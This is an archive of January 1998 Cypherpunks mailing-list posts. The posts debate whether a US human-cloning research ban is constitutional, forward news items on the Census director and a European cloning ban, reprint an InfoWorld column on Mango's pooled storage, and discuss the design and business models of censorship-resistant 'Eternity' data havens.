Content-Type: text/plain



On Mon, 12 Jan 1998, Tim May wrote:

[...]
> Clinton is asking Congress to ban research into human cloning.
[...]
> No, Clinton is asking for Congress to *ban* such research, regardless of
> where the funding came from. "Clone a cell, go to jail."
[...]
> Though I'm not a constitutional expert, this would seem to me to be a
> violation of various rights. A First Amendment right to speak and publish
> as one wishes for one, a Fourth Amendment right against search and seizure

Actually, not at all.

There is no ban on publishing information on cloning, "just" a ban on the
activity.  Hence the first amendment is not implicated.  If it were the
case the every action (as opposed to speech/publication) were protected by
the 1st Am. then every statute making robbery a crime would be
unconstitutional too.

Similarly, the 4th Am. is not implicated.  The right to be secure against
UNREASONABLE search and seizure is not violated when and if congress
passes a law defining a new crime, or you are arrested for committing it.

> and to be secure in one's papers, and probably more general rights that
> have long-held that government agents cannot tell people what books they

again, note that the ban is on CLONING, not THINKING OR WRITING OR READING
about cloning.  It's not the same thing. 

> may read, what thinking they may do, and  whom they may asssociate with (if
> the Civil Rights Act is viewed as the unconstitutional anomaly it is).

This is an aside, but the CRA is in no way anomalous given the 13th, 14th
and 15th Amendments.  It is only "anomalous" if one sticks to the
Constitution as written in the 18th century... and ignores the articles
written in that same century that clearly contemplate amendments....

[...]
> 
> But a ban on cloning research would not be a matter of "national security,"
> only of ethics and religious beliefs. Whatever the arguments for banning
> unapproved research into CBW and nuclear weapons, banning cloning research
> is an entirely different set of issues.
> 

Arguably, many of the legal bans in force today are due to ethics, e.g.:

* bans on suicide
* bans on plural marriage
* bans on certain abortions
* bans on ingestion of some substances

The courts in their infinite wisdom have not found these to be
unconstitutional laws.

> Any implications for crypto? If Congress can successfully make certain
> types of science illegal, felonizing the search for truth, why not a ban on

Again, this misunderstands somewhat: the ban is on EXPERIMENTS (which are
indeed part of the search for truth), but not writing, reading thinking

> certain types of mathematics research?

Not directly, IMHO.

A. Michael Froomkin          +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law   
U. Miami School of Law       froomkin@law.miami.edu
P.O. Box 248087              http://www.law.miami.edu/~froomkin/
Coral Gables, FL 33124 USA   It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Tue, 13 Jan 1998 20:50:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: (eternity) autonomous agents
In-Reply-To: <E0xs4ia-0006uX-00@heaton.cl.cam.ac.uk>
Message-ID: <199801131244.HAA22857@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Ross Anderson:
> Adam Back:
> 
> > If the participant in the CPU resource market is not expected to be
> > able to vet all source code he runs, this gives the would be eternity
> > operator a chance to distribute his risk.
> 
> It's even better than this - your PC becomes a common carrier and you
> are no longer liable :-)

You would be expected to comply with efforts to stamp out illegal activities.
Laws may be passed (e.g. CDA) which would require technical measures to
prevent illegal activity even if you are a common carrier.  Legal
protection is fundamentally weak if the government does not like you. 

Worst case, a government or other criminal organization could employ
technical twrrorist tactics to take out the entire eternity network, if
possible, even if no illegal activity is taking place.

I agree that building a sufficiently large "eternity network" such that
the 1% or so of traffic which is illegal is impossible to censor without
affecting the other 99%.  I believe the web or the internet as a whole
are now large and important enough to Joe Sixpack that shutting them off
to stop illegal activity is infeasible -- I do not agree that USENET
is.  I think 2 weeks of press in the US about "USENET, the network used
by kiddie porn photographers to trade photos, must be shut down" would be
enough to shut usenet in the US down.

> Tim May:
> 
> > Another science fiction writer, Bruce Sterling, popularized "data havens"
> 

> data service would need some way of resisting pressure from the EU and
> the US government. Most of the tax havens do this by being under a
> colonial umbrella. Is there an alternative? Can we create virtual
> colonies in cyberspace? Can we set up a gateway to Eternity in some
> country like Liberia or Somalia, which is too dangerous even for the
> US Marines? Or do we have to cut a deal with Sir Humphrey?

I believe that the US+UK together could shut off nearly all communications
into or out of Libya or Somalia or Liberia or any other small country.  They
already put a fair amount of pressure on the Seychelles (my current
pick for favorite portential datahaven country outside of colonial reach),
and money laundering can survive with less of an established communications
infrastructure than high speed internet communications, at least from
what I know of money laundering.  A "datahaven country" would have
to be immune to such tactics -- either having its own strong military 
(China as datahaven) to defend its national interests, political
connections (Israel?), or enough trade with the US that shutting off
data commo would be impossible for economic reasons (Singapore?).  

If it comes to actual violence in meatspace, I don't think there's anything
a major power couldn't do to a small cypherpunk project.  One approach
would be quickly allying with interests capable of defending themselves 
against such threats -- organized crime, money laundering, arms trading,
etc. -- but even they for the most part could not stand up to a concerted
attack by a government -- they exist through secrecy and connections.  
> 
> Given the rate at which spam is growing these days, maybe that's where
> to put it. If the only way for Authority to cut mortals off from
> Eternity was to pass effective laws against spam, and the only way to
> stop spam was to have a global non-escrowed public key infrastructure
> so that all mortals could be strongly authenticated, then ...

My bet is on the web.  Billing "Eternity DDS" as a sophisticated fault
tolerant web server, which has market-based protocols for exchanging
data futures.  And also designing the protocol to support "financial
services" conducted through eternity dds futures trading.  Get enough
kosher data into it and you can protect yourself from TA, from 
wholesale shutting down of the system, etc.

The same techniques which protect you from a government shutting down
the service protect you from an enemy of someone storing data
in the system shutting down the system.

The single best thing I've seen recently was Ross Anderson's comment
about 90% of cypherpunks work being on secrecy/etc. and 90% of
the commercial IT money going to fault tolerance.  I believe, at least
for an eternity service, one provides the other, and that's
how it can be "sold" to enough users to make it safe for unpopular
users.

(Steganographic File System sounds very interesting -- will the paper
be available online?)
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLthpawefxtEUY69AQHtdQgAkzJx1Hp6LR2mBRuiRnH4QGl+OfHGL0mS
2PfzZCT31dE2ZrrbR/VEHVQEHWsP+eI0aOemVUsiFYMMyEjLtor12Fp+tWndJd++
bAVBpcpdj7liq2wYvyvTwEuJ/PeyHahHgh7rYLY3HNMzWVyjtZHg4hwRIFRPg4ic
FIkc+a+obCmBnjYTUKb8mjkmZGdNKe107+l7J3k0wPvEE1GE5cKmxEOd2xmfzt/r
L0VbRR/6SxDQ3Kp/dEbEVcEBAdUuyLykQnkWHqR9q8mO5dT8Uq/SmyKtWyVYAKir
X8m6hDAzvXbMAKKU3N3GC4pGRO8LsCUTdqhi1/HGAQ+4sJW5ar05Pg==
=ANh3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 14 Jan 1998 12:11:48 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: 1 Question to Dr. Froomkin...
In-Reply-To: <199801131845.MAA28160@einstein.ssz.com>
Message-ID: <Pine.BSF.3.91.980113085519.8809C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Hmmm ... this could turn out to be more interesting than the gun nutz 
threads ...

On Tue, 13 Jan 1998, Jim Choate wrote:

> Sir,
> 
> Do you accept that the Constitution of the United States of America is the
> supreme law of the land and therefore the ultimate legal authority within
> its borders?
> 
> 
>     ____________________________________________________________________
>    |                                                                    |
>    |      Those who make peaceful revolution impossible will make       |
>    |      violent revolution inevitable.                                |
>    |                                                                    |
>    |                                          John F. Kennedy           |
>    |                                                                    |
>    |                                                                    | 
>    |            _____                             The Armadillo Group   |
>    |         ,::////;::-.                           Austin, Tx. USA     |
>    |        /:'///// ``::>/|/                     http://www.ssz.com/   |
>    |      .',  ||||    `/( e\                                           |
>    |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
>    |                                                 ravage@ssz.com     |
>    |                                                  512-451-7087      |
>    |____________________________________________________________________|
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 22:34:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Census Director quits [CNN]
Message-ID: <199801131500.JAA27056@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>    By RANDOLPH E. SCHMID
>    Associated Press Writer
>    
>    WASHINGTON (AP) -- Census Director Martha Farnsworth Riche, who
>    battled Republican lawmakers over counting methods for 2000, is
>    quitting.
>    
>    Riche said Monday she would leave office Jan. 30.
>    
>    She has been involved in a lengthy dispute with members of Congress
>    over Census 2000, largely over how to count the many people who might
>    be missed by regular methods.
>    
>    The fight focused on a practice called sampling, in which the bureau
>    would determine the number and characteristics of people it cannot
>    reach based on the people it can.
>    
>    Though the practice was endorsed by the National Science Foundation
>    and statistical groups, Republicans in Congress have opposed it,
>    concerned that the result would be more people counted in largely
>    Democratic large cities.
>    
>    The results will be used to redistribute House seats to the states.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 13 Jan 1998 22:35:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: 19 European countries ban human cloning [CNN]
Message-ID: <199801131501.JAA27115@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                  19 EUROPEAN NATIONS SIGN BAN ON HUMAN CLONING
>                                        
>   Britain, Germany not among signatories
>   
>      January 12, 1998
>      Web posted at: 8:00 p.m. EST (0100 GMT)
>      
>      PARIS (CNN) -- Nineteen European nations on Monday signed an
>      agreement to prohibit the cloning of humans.
>      
>      Representatives from 19 members of the Council of Europe signed a
>      protocol that would commit their countries to ban by law "any
>      intervention seeking to create human beings genetically identical to
>      another human being, whether living or dead." It rules out any
>      exception to the ban, even in the case of a completely sterile
>      couple.
>      
>      "At a time when occasional voices are being raised to assert the
>      acceptability of human cloning and even to put it more rapidly into
>      practice, it is important for Europe solemnly to declare its
>      determination to defend human dignity against the abuse of
>      scientific techniques," Council Secretary-General Daniel Tarchys
>      said.
>      
>      The text, which is to become a part of the European Convention on
>      Human Rights and Biomedicine, would permit cloning of cells for
>      research purposes.CNN's Margaret Lowrie reports
>      icon 2 min. 3 sec VXtreme video
>      
>      The accord will become binding on the signatories as soon as it has
>      been ratified in five states.
>      
>      Countries signing are: Denmark, Estonia, Finland, France, Greece,
>      Iceland, Italy, Latvia, Luxembourg, Moldova, Norway, Portugal,
>      Romania, San Marino, Slovenia, Spain, Sweden, Macedonia and Turkey.

[text deleted]


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 14 Jan 1998 09:48:25 +0800
To: Ross Anderson <cypherpunks@cyberpass.net
Subject: Re: (eternity) autonomous agents
In-Reply-To: <E0xs85A-0000PO-00@heaton.cl.cam.ac.uk>
Message-ID: <3.0.5.32.19980113090634.00855c40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Ryan Lackey:
>>                     A "datahaven country" would have
>> to be immune to such tactics -- either having its own strong military 
>> (China as datahaven) to defend its national interests, political
>> connections (Israel?), or enough trade with the US that shutting off
>> data commo would be impossible for economic reasons (Singapore?).  

China _is_ currently a data haven, and the US trade talks have been
focussed on getting them to stop it.  It's not using the Internet,
just CDROMs and snailmail, but it's a huge market...

At 03:16 PM 1/13/98 +0000, Ross Anderson wrote:
>A virtual datahaven could be constructed eaily provided you knew how to
>index controversial matter.
>Publish the rude things about the Prophet Mohammed on a server in Israel,
>the anti-Serb rants in Croatia, the kiddyporn in Sweden, the violence in
>America, the Nazi hate speech in Syria and the anti-scientology stuff in
>Germany.

But to do that you've got to know what's on your server,
and data havens strongly depend on deniability and scalability,
so you don't sell those bits on the chips implanted in your head.
You could manage your storage in a way that lets users specify where
they _don't_ want a given opaque file to be, so they can keep
the anti-Foobarian speech out of Foobar, but if you let them
specify where they do want it, it's too easy to plant stuff.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 13 Jan 1998 22:27:33 +0800
To: cypherpunks@cyberpass.net
Subject: Micromoney CryptoMango?
Message-ID: <v04003918b0e1255d2b83@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Tue, 13 Jan 1998 08:52:16 -0500
From: rah-web <rah@shipwright.com>
Reply-To: rah@shipwright.com
MIME-Version: 1.0
To: rah-web <rah@shipwright.com>
Subject: Micromoney CryptoMango?

http://www.infoworld.com/cgi-bin/displayNew.pl?/metcalfe/metcalfe.htm

[Image] [StorageTek Click Here.]

[| Navigational map -- for text only please go to the bottom of the page |]
[|Opinions|]

 [From the Ether]

       January 12, 1998

       Mango `pooling' is the biggest idea we've seen since network
       computers

       Mango, in Westborough, Mass., is not your average software
       start-up. In 30 months the company has raised $30 million.
       Its first product, Medley97, has shipped, transparently
       "pooling" workgroup storage.

       And someone at http://www.mango.com really knows the
       difference between features and benefits.

       But it's not the benefits of Medley97 pooling that interest
       me. What's interesting are the features and long-term
       potential of Mango's underlying distributed virtual memory
       (DVM). Mango's pooling DVM is the biggest software idea
       since network computers -- perhaps since client/server --
       and Microsoft had better watch out.

       According to Mango, Medley97 offers transparent networking
       that's easy to use, fast, and reliable (not to mention
       secure and high fiber).

       Windows users working together on a LAN can share files in a
       pool of their combined disk storage. Every pooled PC is both
       a client and server.

       Go ahead and drop Medley97 into any PC you want to pool.
       Medley97 installs, checks configuration, and updates
       required Windows networking software. The product adds the
       PC's storage to the pool, giving you a shared, fast, and
       reliable network drive, M:/, which is available on all
       pooled PCs. For this you pay Mango less than $125 each for
       up to 25 PCs.

       Mango CEO Steve Frank was technology chief at Kendall Square
       Research (KSR), the ill-fated parallel processing company
       near MIT that was not Thinking Machines. Frank says KSR
       taught him how dishonesty doesn't work but parallelism does.

       Unlike KSR's, Mango's parallelism just has to be on volume
       platforms, such as Ethernet, TCP/IP, and Windows.

       Hence Mango.

       Underlying Medley97 are DVM processes cooperating through a
       TCP/IP Ethernet on pooled Windows PCs. The processes manage
       a 128-bit object space that copies virtual 4KB pages up,
       down, and around a distributed memory hierarchy.

       Medley97 offers ease of use by hiding continuously,
       automatically, and adaptively behind your familiar Windows
       user interface -- just below the file system APIs and above
       physical disk pages.

       Medley97 offers performance by moving files through the
       Ethernet from disk to disk and from disk to memory, closer
       to where the pages are used most.

       And Medley97 offers reliability by keeping synchronized
       backup copies of file pages on different pooled PCs.

       Mango's DVM generalizes backup and caching. Pages are copied
       for nonstop operation. Copies are moved closer to where they
       are used. Frank says it is often faster to access a page
       through Ethernet from a pooled PC's semiconductor memory
       than to access it from a local disk.

       Transaction logs are kept on all pooled PCs. The DVM detects
       when a PC drops out of a pool and copies any page that
       thereby lacks sufficient backups. When a PC rejoins a pool,
       transaction logs ensure it accesses updated pages. The
       garbage collection of deleted pages runs in the background.

       Noticing that Medley97 is available for up to 25 PCs, I
       asked the perennial parallelism question, "Does it scale?"

       Frank's answer: Yes. Medley97 is limited to 25 PCs only
       because that's all Mango has so far found time to test. With
       each PC adding resources, pool performance is "superlinear"
       as far as the eye can see.

       Well, this makes pooling the next in a long list of major
       computing paradigms: batch mainframes, interactive
       minicomputers, stand-alone PCs, PC LANs, client/server,
       peer-to-peer, thin-client, server clustering, and now peer
       clustering or pooling.

       According to Frank, Medley next needs to go from Ethernet to
       Internet. To support many pools. To add change control and
       archiving.

       Medley also needs to go beyond Windows. To pool processing
       as well as storage.

       So Medley, now written in C++, needs what else? Java.

       You can log into a Medley pool from anywhere and have your
       workgroup files available on the M:/ drive. With Java you
       could pool non-Wintel network computers.

       Well, if pooling scales, the whole World Wide Web should be
       one big pool. Mango's DVM generalizes the caching now done
       ad hoc all over the Web -- on server disks, in clusters, in
       caching farms, in proxy servers, in browsers, and in the
       file systems of PCs.

       Add Java network computers and before Frank knows it, Mango
       will be ripe for purchase if not integration by Microsoft.

                      ------------------------------

                                 [Image]

       Technology pundit Bob Metcalfe invented Ethernet in 1973 and
          founded 3Com in 1979, and today he specializes in the
             Internet. Send e-mail to Metcalfe@infoworld.com.

                    Missed a column? Go back for more.

                                 [Image]

                      ------------------------------

               Copyright (c) 1998 InfoWorld Media Group Inc.

      | SiteMap |Search | PageOne | Conferences | Reader/Ad Services |
         | Enterprise Careers | Opinions | Test Center | Features |
           | Forums | Interviews | InfoWorld Print | InfoQuote |
      [Lion's Den] [InfoWorld Electric Features] [Intel Manageability]

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 14 Jan 1998 09:49:12 +0800
To: Ryan Lackey <rdl@mit.edu>
Subject: Re: Eternity Services
In-Reply-To: <v03102806b0df4ce0852e@[207.167.93.63]>
Message-ID: <3.0.5.32.19980113091745.00856d80@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



hAt 12:49 AM 1/12/98 EST, Ryan Lackey wrote:
>[Tim May wrote:]
>> I am surprised, I have to admit, that Ryan is talking so much about raising
>> money, getting investors, etc., when no _working model_ of his scheme has
>> been deployed for people to play with, find weaknesses in, etc.
>
>No working model has been deployed by me as of yet.  However, most of the
>components are "solved problems", with existing working models.  Worst case,
>it would be possible to accomplish equivalent functionality by linking
>these by remailers and hoping no one shuts down the remailers.

My guess is that the technical aspects are relatively solvable,
at least if the market comes through with reasonable digicash.
The technical design can be fun, and lots of pieces exist.
The "Don't Quit Your Day Job" (or in this case, school) criteria are 
harder - doing the business plan that makes a reasonable case that
1 - Service Providers using your model can make money
2 - You personally can make money
3 - Potential investors (including you) can make money
	funding the development
Three obvious business models for you and your investors are
2a - Operate the service yourself, hiring people or renting space
	in as many countries as you need for safety/reliability
2b - Sell/license the software to commercial providers
2c - Freeware, perhaps with some way for you to get advertising revenue
	or at least sufficient fame to get consulting business.

Which combinations of these options can achieve wide usage depends
a lot on your models of users of the system; some of those models
are moneymakers, some aren't, some are safe, some are dangerous,
and some just attract a sleazy clientele.  Here are a few models

- public, permanant, non-controversial - the archive business
	for URLs for academic papers, news services,
	and possibly for contracts, wills, court documents, etc., 
	which may have some privacy (e.g. an encrypted document 
	showing the owners and keyids) or may not be indexed.
	This model is easy, and the only reason you need
	to franchise the business rather than running it yourself
	is to increase the confidence of the users that the
	service will be permanent.  The obvious financial model
	is that computers and storage become cheaper every year,
	so the cost of 100 years of storage is probably only
	25-100% higher than 5 years of storage.  The costs of retrieval
	are different from the costs of storage; you may do something
	like advertising banners to handle frequent-retrieval vs.
	occasional-retrieval material, or charge directly per hit, etc.

- public, permanent, controversial - political manifestos,
	samizdata, Singaporean chewing-gum recipes, 
	formerly secret documents of governments and businesses.
	Spreading across multiple jurisdictions is
	critical here, but governments do cooperate enough
	that few places are safe for everything.  For instance,
	a Finnish court might order a server to stop publishing
	copyrighted Scientology documents based on a US court order;
	anything copyrighted needs to be hosted by non-Berne-convention
	locations.  I don't know how cooperative governments are about
	libel suits from other jurisdictions; "libel against governments"
	is clearly a different case from regular personal libel.

- non-indexed semi-public medium-term controversial -
	porn servers, warez, credit reporting services, and the like.
	By "non-indexed semi-public", I mean things that you can
	retrieve if you know the name and maybe have a password,
	but can't retrieve if you don't, and maybe they're encrypted.
	Some of them may be revenue generators for the storage customer
	(e.g. they've got advertising banners, or they require digicash
	to be collected somehow, or maybe there's a password-of-the-month
	needed to decrypt them, which is sold separately from distribution.)
	Here you need to worry about attacks, since pictures that are
	legal in LA or Paris may be illegal in Memphis, Tokyo, or Riyadh,
	and transaction data that's legal in Anguilla may violate
	data privacy laws in Berlin or fair credit reporting in Washington,
	and warez that are gray-market in Beijing may get you jailed in
	Redmond (while the porn that's legal in Redmond may get you 
	jailed in Beijing.)  
	You also have to worry about targeted attacks - the government
	that can't stop you from publishing the Anti-Great-Satan Manifesto
	can go plant child porn and stolen Microsoft warez on your server
	to get you shut down in your home country.

- non-indexed semi-public medium-term non-controversial -
	encrypted corporate backups and the like.  If you've implemented
	things right, a subpoena for all your files worldwide still
	won't let anybody find a useful piece of non-indexed data,
	but can still let anybody with the name and password recover it.
	Indexing becomes the job of the user; the index for a user
	is just another data file.  This may be where you make the 
	legitimate money, if you can convince enough businesses to
	use your services, and where you provide the cover traffic
	for the controversial material.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Tue, 13 Jan 1998 23:56:18 +0800
To: Thomas Womack <thomas.womack@merton.oxford.ac.uk>
Subject: Re: (eternity) autonomous agents
In-Reply-To: <01bd2037$68046310$409001a3@mc64.merton.ox.ac.uk>
Message-ID: <199801131551.KAA23584@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Tom Womack wrote:
> Ross Anderson wrote:
> 
> >A virtual datahaven could be constructed eaily provided you knew how to
> >index controversial matter.
> >
> >Publish the rude things about the Prophet Mohammed on a server in Israel,
> >the anti-Serb rants in Croatia, the kiddyporn in Sweden, the violence in
> >America, the Nazi hate speech in Syria and the anti-scientology stuff in
> >Germany.
> 
> I suspect you will still run into things which are illegal anywhere;
> national-security stuff can be handled provided you've got a complete list
> of pairs of unfriendly nations, but I don't think (eg) the more extreme sort
> of kiddyporn is legal *anywhere*.
> 
> Tom
> 

Additionally, you could have the Fahd family annoyed by this stuff in Israel,
post the names of all the Mossad agents to the same server, and have
the server have an accident.

You would need to go beyond "indexing" to "enforcement" if you wanted to
make it safe for people to run open datahavens.  True, you could still
do this regulatory arbitrage thing by having datahaven owners look at
the data, see if they can store it, then price it based on how safe it would
be for them to store it -- that's the kind of thing a market-based
Eternity service would include (as well as people with different levels
of risk tolerance being willing to take more dangerous data, ephermeal
servers, etc.).  A market-based system can overcome just about everything --
it will take into account the regulatory climate, political connections,
size of the site, etc.

The problem is that if you encrypt everything such that server operators
don't know what it is, you're "selling them a bill of goods", so they don't
really have the chance to correctly price their data.  Plus, they have
no way of knowing even if the data is unencrypted that your list of
the sins of the prophet do not include a steganographically-encoded
list of Mossad agents.

You can't assume people in the system will "play fairly" unless there
are market reasons for them to do so.  Perhaps persistent identities for
those committing files?

Basically, in the age old contest between arms and armor, arms win every time.

BTW, I don't really like the overly negative names for Eternity, like
"inferno", or whatever.  I like to think my data is *good* data, deserving
of a better fate.  Elysium, perhaps?   Or just use "eternity" 
in place of "eternityspace" (a word I never should have used, since it means
the same thing), as in "upload these files to eternity", "the collection
of files currently stored in eternity", etc.  Little danger of confusion 
with pedestrian meanings of the word eternity, too, I think, and there
is no real reason to draw a distinction between eternity the location for
documents and eternity the overall system for creating such a space.
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLuNb6wefxtEUY69AQE/Xgf8C/y82HnErTwi5UniP6oIW/4nVnlxfGyM
BJZeKPb7vwK8AOdzynI+6Mj5Acrr/Ojlo9OiaBzBavVAPqvA9VcEeKeB45erhQEQ
SxXwKDQL2/EBxlIM/pJkmUuggg3/7HJ1UugO6qtKIq2cKgsdLZhqKlyWpxVSdEwa
JN4eC3cz3iFeUUZmeDG0Rpk4YWcXDmeKP31l0EfU6SQ2uIiOAmlX7PLdRh6rgTIW
4GbyYZRPEuQRUJ3RAqIRFExMgEXvZ1CsYsvrolJCDxcF5sluZpOCM8WolGhwpCBj
HI4Zl1QofMEOojoLhEZ4jV4/uTf9VrKisYSeEEGBewnm3DOAuu1PyA==
=AvF+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 14 Jan 1998 03:09:53 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Talk of Banning Research into Human Cloning (fwd)
In-Reply-To: <199801130612.AAA25763@einstein.ssz.com>
Message-ID: <v03102800b0e16505cc00@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:02 AM -0800 1/13/98, Michael Froomkin (as Anonymous) wrote:
>> > There is no ban on publishing information on cloning, "just" a ban on the
>> > activity.
>>
>> Spin doctor bullshit. Without the research there isn't anything to publish.
>> By banning the basic research we would in fact be banning the publishing of
>> the results of that scientific research.
>
>This is a more significant difference than you let on: if the research is
>done abroad, it can be published here.  To the extent that one can
>theorize without experimenting, that too can be done here.

I don't believe we know yet what the proposal is. I've heard some versions
which allow any and all research up to, but not including, the actual
production of a viable human clone. And I've heard versions being proposed
which would push the ban further back down the line.

As I have made clear, I don't believe "banning research" which is neither
"commerce between the states" nor a direct harm to others (as the "robbery"
example Michael Froomkin used earlier as a parallel is), is supported by
the Constitution.

Just as I don't believe "banning activity X" is generally supported unless
there is some constitutional mention.  To pick some examples, banning
research into UFOs would not be supported. Banning jumping on pogo sticks
would not be supported. Banning possession of wool sweaters would not be
supported.

(I could go on, but won't. There are degrees of what "unconstitutional"
means. I take a civil libertarian, even libertarian (of course), view about
what is an acceptable role for government and law. We have debated this
many times, and I have no time to debate Michael again on this issue.
Suffice it to say I think it completely inappropriate, and
"unconstitutional," for government to ban research.)


>Congress has the power to choose whether to ban acts when the cause a harm
>(fists that connect to federal noses), or just to ban acts whether or not
>they cause harms (sending threats to government officials; broadcasting
>without a license on an unused frequency).  Like it or not, there is no
>question that most of these bans -- including the cloning ban -- are
>constitutional under the commerce and other powers, the copyrights clause
>notwithstanding.

This broad use of the commerce clause could of course be applied to ban
almost any activity. I don't think the Founders had this in mind, but,
again, I have a civil libertarian view of such things.

If the commerce clause is claimed to apply to cloning--how, by the
way?--then it can apply to mathematical research, linguistics research, and
just about every other kind of research.

And if the cloning ban is a ban on research in certain areas, as many are
pushing for (but, again, the final laws have not been proposed, much less
passed, so we'll have to wait), then is this not prior restraint on
publishing?

(BTW, most of the "effort" toward human cloning will be the 99.5% of  the
research, publication, discussion, etc. leading up to the final
implantation. If the ban is to have any meaning, it must hit this 99.5%,
just as the end of Federal funding has targetted this 99.5%. To wait until
the final act is too late, as that can then be done in a foreign lab...or
in any number of U.S. labs which the Clone Police will of course be unable
to monitor!)


>PS.  I killfiled this guy ages ago on the grounds of rudeness, general
>unpleasantness, and especially a complete and utter incomprehension about
>how the law in this country operates.  It is as if someone once read some
>software company's publicity about how easy it is to operate their
>software and concluded they should therefore be able to write programs in
>any language.


Yeah, I've gone back to killfiling him, too. Too many rants, too many
forwardings of online news articles, and, as you say, a peculiarly
literalist interpretation of the Constitution. (I also have somewhat of a
literalist interpretation, but hopefully a more justified one.)

>Since someone forwarded me this post, I'm replying to it, but I doubt I'll
>bother doing so in the future.  I entered this thread because Tim May made
>some comments; I respect his writing and I think other people probably do
>too.  As a result, it seemed important to offer some basic doctrine as a
>response.  Note, again, that I'm not expressing a view on the MERITS of
>the legislation, just one law professor's view on whether courts would be
>likely to uphold it if it passes.

I think Michael Froomkin has far too expansive a view of the powers granted
government in the Constitution. The frequent citing of the commerce clause
and "other powers" can be used to argue that government has the power to
regulate just about everything, to tell people what kind of clothing they
can wear (they might cross state lines), to limit access to research
(commerce again), to tell them whom they must hire and whom they may not
hire (Civil Rights Act), and so on.

At least most proponents of draconian new laws restricting crypto, for
example, adopt the fig leaf of talking about "compelling national
interests" and suchlike. They don't simply cite the commerce clause as the
basis for restricting crypto.

(Even flakier arguments, in my view, are ones based on nebulous "public
welfare" arguments. These can be used to ban nearly anything, from the
eating of meat to the location of casinos to the licensing of
broadcasters....a recipe for a total state.)

It'll be interesting to see if the ACLU steps into the "ban on cloning,"
especially any possible (and likely, I think) "ban on cloning research"
laws. If they accept Prof. Froomkin's argument that such a ban is ipso
facto constitutional, I'd be surprised.

And, like Froomkin, I'm not arguing for the merits or demerits of human
cloning research (though I believe it's already unstoppable, and any ban
will simply move it into the "bootleg research" area, which tickles my
crypto anarchist interests anyway!). And I hope the ACLU would not argue on
the basis of merits or not of such research.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
